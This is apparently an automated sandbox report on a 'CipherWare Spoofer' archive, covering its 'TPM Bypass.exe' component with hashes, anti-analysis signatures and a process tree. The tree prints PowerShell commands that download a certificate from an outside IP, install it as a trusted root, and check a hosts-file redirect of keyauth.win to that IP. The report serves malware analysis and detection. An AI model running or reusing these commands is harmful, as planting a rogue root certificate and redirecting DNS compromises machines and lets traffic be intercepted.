Overview
overview
10Static
static
7CipherWare...29.rar
windows7-x64
3CipherWare...29.rar
windows10-2004-x64
3CipherWare...ns.txt
windows7-x64
1CipherWare...ns.txt
windows10-2004-x64
1CipherWare...ol.exe
windows7-x64
7CipherWare...ol.exe
windows10-2004-x64
7out.exe
windows7-x64
out.exe
windows10-2004-x64
CipherWare...gs.vbs
windows7-x64
3CipherWare...gs.vbs
windows10-2004-x64
1CipherWare...ol.ini
windows7-x64
1CipherWare...ol.ini
windows10-2004-x64
1CipherWare...me.url
windows7-x64
1CipherWare...me.url
windows10-2004-x64
1CipherWare.../1.png
windows7-x64
1CipherWare.../1.png
windows10-2004-x64
3CipherWare.../2.png
windows7-x64
1CipherWare.../2.png
windows10-2004-x64
3CipherWare.../3.png
windows7-x64
1CipherWare.../3.png
windows10-2004-x64
3CipherWare...ne.url
windows7-x64
1CipherWare...ne.url
windows10-2004-x64
1CipherWare...32.exe
windows7-x64
3CipherWare...32.exe
windows10-2004-x64
3CipherWare...64.exe
windows7-x64
3CipherWare...64.exe
windows10-2004-x64
3CipherWare...ub.ini
windows7-x64
1CipherWare...ub.ini
windows10-2004-x64
1CipherWare...er.exe
windows7-x64
10CipherWare...er.exe
windows10-2004-x64
10CipherWare...ss.exe
windows7-x64
9CipherWare...ss.exe
windows10-2004-x64
9Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
11-06-2024 11:21
Behavioral task
behavioral1
Sample
CipherWare Spoofer 04-29.rar
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
CipherWare Spoofer 04-29.rar
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
CipherWare Spoofer 04-29/Instructions.txt
Resource
win7-20240508-en
Behavioral task
behavioral4
Sample
CipherWare Spoofer 04-29/Instructions.txt
Resource
win10v2004-20240426-en
Behavioral task
behavioral5
Sample
CipherWare Spoofer 04-29/Requirements/Defender Control/Defender Control.exe
Resource
win7-20240215-en
Behavioral task
behavioral6
Sample
CipherWare Spoofer 04-29/Requirements/Defender Control/Defender Control.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
out.exe
Resource
win7-20240508-en
Behavioral task
behavioral8
Sample
out.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral9
Sample
CipherWare Spoofer 04-29/Requirements/Defender Control/Defender_Settings.vbs
Resource
win7-20240220-en
Behavioral task
behavioral10
Sample
CipherWare Spoofer 04-29/Requirements/Defender Control/Defender_Settings.vbs
Resource
win10v2004-20240426-en
Behavioral task
behavioral11
Sample
CipherWare Spoofer 04-29/Requirements/Defender Control/dControl.ini
Resource
win7-20240508-en
Behavioral task
behavioral12
Sample
CipherWare Spoofer 04-29/Requirements/Defender Control/dControl.ini
Resource
win10v2004-20240508-en
Behavioral task
behavioral13
Sample
CipherWare Spoofer 04-29/Requirements/DirectX End-User Runtime.url
Resource
win7-20240215-en
Behavioral task
behavioral14
Sample
CipherWare Spoofer 04-29/Requirements/DirectX End-User Runtime.url
Resource
win10v2004-20240426-en
Behavioral task
behavioral15
Sample
CipherWare Spoofer 04-29/Requirements/Disable IPv6 First/1.png
Resource
win7-20240419-en
Behavioral task
behavioral16
Sample
CipherWare Spoofer 04-29/Requirements/Disable IPv6 First/1.png
Resource
win10v2004-20240426-en
Behavioral task
behavioral17
Sample
CipherWare Spoofer 04-29/Requirements/Disable IPv6 First/2.png
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
CipherWare Spoofer 04-29/Requirements/Disable IPv6 First/2.png
Resource
win10v2004-20240508-en
Behavioral task
behavioral19
Sample
CipherWare Spoofer 04-29/Requirements/Disable IPv6 First/3.png
Resource
win7-20240221-en
Behavioral task
behavioral20
Sample
CipherWare Spoofer 04-29/Requirements/Disable IPv6 First/3.png
Resource
win10v2004-20240508-en
Behavioral task
behavioral21
Sample
CipherWare Spoofer 04-29/Requirements/Visual C++ Redistributable Runtimes All-in-One.url
Resource
win7-20240508-en
Behavioral task
behavioral22
Sample
CipherWare Spoofer 04-29/Requirements/Visual C++ Redistributable Runtimes All-in-One.url
Resource
win10v2004-20240226-en
Behavioral task
behavioral23
Sample
CipherWare Spoofer 04-29/Requirements/Windows Update Blocker/Windows Update Blocker x32.exe
Resource
win7-20240221-en
Behavioral task
behavioral24
Sample
CipherWare Spoofer 04-29/Requirements/Windows Update Blocker/Windows Update Blocker x32.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral25
Sample
CipherWare Spoofer 04-29/Requirements/Windows Update Blocker/Windows Update Blocker x64.exe
Resource
win7-20240508-en
Behavioral task
behavioral26
Sample
CipherWare Spoofer 04-29/Requirements/Windows Update Blocker/Windows Update Blocker x64.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral27
Sample
CipherWare Spoofer 04-29/Requirements/Windows Update Blocker/Wub.ini
Resource
win7-20240508-en
Behavioral task
behavioral28
Sample
CipherWare Spoofer 04-29/Requirements/Windows Update Blocker/Wub.ini
Resource
win10v2004-20240426-en
Behavioral task
behavioral29
Sample
CipherWare Spoofer 04-29/Spoofer.exe
Resource
win7-20240215-en
Behavioral task
behavioral30
Sample
CipherWare Spoofer 04-29/Spoofer.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral31
Sample
CipherWare Spoofer 04-29/TPM Bypass.exe
Resource
win7-20240419-en
General
-
Target
CipherWare Spoofer 04-29/TPM Bypass.exe
-
Size
5.4MB
-
MD5
226b0aaa3a81ae166681f1b3c41209f5
-
SHA1
1e932f41b49428704d2e1ee5cec08a4e61c7d094
-
SHA256
2c4bd49d86851a375e3669ee361e1a786d59765eb7dbaeeddc62f5cb18f1c66d
-
SHA512
290ec6a64f3166e516cdcdde28bb99644902598378a18b867e496e0fb821d6597e202d179653353a4da97c1a94f67fed4340e914306a837be85162c0b023a013
-
SSDEEP
98304:ZXbIrqkTdrVLNdMJ6Hz7OFBZqSn+m6mB5CxFwHXDty:9IBTdrhMJ6Hz0kSn+WKuHXDty
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TPM.exe -
pid Process 2184 powershell.exe 2688 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TPM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TPM.exe -
Executes dropped EXE 2 IoCs
pid Process 2408 TPM.exe 1120 Process not Found -
Loads dropped DLL 1 IoCs
pid Process 2076 TPM Bypass.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA TPM.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2408 TPM.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 284 ipconfig.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2184 powershell.exe 2688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2184 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
pid Process 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe -
Suspicious use of SendNotifyMessage 10 IoCs
pid Process 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe 2076 TPM Bypass.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2076 wrote to memory of 2492 2076 TPM Bypass.exe 28 PID 2076 wrote to memory of 2492 2076 TPM Bypass.exe 28 PID 2076 wrote to memory of 2492 2076 TPM Bypass.exe 28 PID 2492 wrote to memory of 2976 2492 cmd.exe 30 PID 2492 wrote to memory of 2976 2492 cmd.exe 30 PID 2492 wrote to memory of 2976 2492 cmd.exe 30 PID 2976 wrote to memory of 3028 2976 cmd.exe 31 PID 2976 wrote to memory of 3028 2976 cmd.exe 31 PID 2976 wrote to memory of 3028 2976 cmd.exe 31 PID 2976 wrote to memory of 2500 2976 cmd.exe 32 PID 2976 wrote to memory of 2500 2976 cmd.exe 32 PID 2976 wrote to memory of 2500 2976 cmd.exe 32 PID 2976 wrote to memory of 2184 2976 cmd.exe 33 PID 2976 wrote to memory of 2184 2976 cmd.exe 33 PID 2976 wrote to memory of 2184 2976 cmd.exe 33 PID 2976 wrote to memory of 2688 2976 cmd.exe 34 PID 2976 wrote to memory of 2688 2976 cmd.exe 34 PID 2976 wrote to memory of 2688 2976 cmd.exe 34 PID 2976 wrote to memory of 2708 2976 cmd.exe 35 PID 2976 wrote to memory of 2708 2976 cmd.exe 35 PID 2976 wrote to memory of 2708 2976 cmd.exe 35 PID 2708 wrote to memory of 2744 2708 cmd.exe 36 PID 2708 wrote to memory of 2744 2708 cmd.exe 36 PID 2708 wrote to memory of 2744 2708 cmd.exe 36 PID 2708 wrote to memory of 2428 2708 cmd.exe 37 PID 2708 wrote to memory of 2428 2708 cmd.exe 37 PID 2708 wrote to memory of 2428 2708 cmd.exe 37 PID 2976 wrote to memory of 2448 2976 cmd.exe 38 PID 2976 wrote to memory of 2448 2976 cmd.exe 38 PID 2976 wrote to memory of 2448 2976 cmd.exe 38 PID 2976 wrote to memory of 284 2976 cmd.exe 39 PID 2976 wrote to memory of 284 2976 cmd.exe 39 PID 2976 wrote to memory of 284 2976 cmd.exe 39 PID 2076 wrote to memory of 2408 2076 TPM Bypass.exe 40 PID 2076 wrote to memory of 2408 2076 TPM Bypass.exe 40 PID 2076 wrote to memory of 2408 2076 TPM Bypass.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\CipherWare Spoofer 04-29\TPM Bypass.exe"C:\Users\Admin\AppData\Local\Temp\CipherWare Spoofer 04-29\TPM Bypass.exe"1⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c @echo off & echo Running checklmao.bat silently... & start "" /min /b cmd /c "C:\Users\Admin\AppData\Local\Temp\checklmao.bat & exit"2⤵
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\checklmao.bat & exit"3⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\system32\certutil.execertutil -store TrustedRoot4⤵PID:3028
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"4⤵PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri http://188.227.107.14/server.crt -OutFile 'C:\Users\Admin\AppData\Local\Temp\server.crt'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Import-Certificate -FilePath 'C:\Users\Admin\AppData\Local\Temp\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -store TrustedRoot | findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"4⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\certutil.execertutil -store TrustedRoot5⤵PID:2744
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"5⤵PID:2428
-
-
-
C:\Windows\system32\findstr.exefindstr /C:"188.227.107.14 keyauth.win" "C:\Windows\System32\drivers\etc\hosts"4⤵PID:2448
-
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns4⤵
- Gathers network information
PID:284
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\TPM.exeC:\Users\Admin\AppData\Local\Temp\TPM.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2408
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.2MB
MD58009d43544d3fe4c26599bbcae17e03b
SHA1ecf1ce31a4d3eb813b5f273dbd073e4f89119448
SHA256abdb3a70dcddb612078fedefe10b3fa53ec63a89776136c5863637e35b512a1b
SHA51266e9505197289a4719634a612056bf588af5d81edc4f83259d241d7a0951ba6ca5a4d8466e9755e870fb052df029b93391bf411cec3c8b1aff52c8c4751010ac
-
Filesize
1KB
MD565b71554b34e595a0088bf996fffddfb
SHA1902cec988a26f29a46fc25ab54ba9537b2f08af3
SHA25638947d774f734828c5aaf1a58d4ca187ccd36bb5390b570b65c5bf4102d074ff
SHA51235c5983f2cf47b981343e0a4dddd6ce880c3a3d555da8c9fe02133dd99ba007b85c49ace2d2694c2cc7f1dd0e6d0a5dfce8a12e681719858f4ac621e1be04905
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a23f9cc982cbea1b2261ea1e5ae40def
SHA13110d24df3fa2a0cba40f78d568127054dee5465
SHA256b32e15932554548a8a3647eed0c1c876ea26d26f6e4adf07da356b28add8bc2c
SHA512893d7cc0c4316e1f2cd961da210520eab311b080390fefe9a44581d21dbeb06d263dafda32fb442b7e1044b9078f8006401694ac71c62fc2332f401989b61f46
-
Filesize
1007B
MD5fa30fe7d3e958884a8b79b94ea7b6e58
SHA1f48bb772d42f7ca8e59d6bc603f186fe36cac550
SHA256e257f23fb8ea40ae0c06d11eeec87ed01a6d76b530632843378d1c1a1e878b49
SHA51252bcc1f25829cf2fb94a9776d0c734eefc81deb91cd60dac2f04d327a01b1485d758f42741de0fe5dda82fe2bf136dc3b68512a22670766f454535da004161da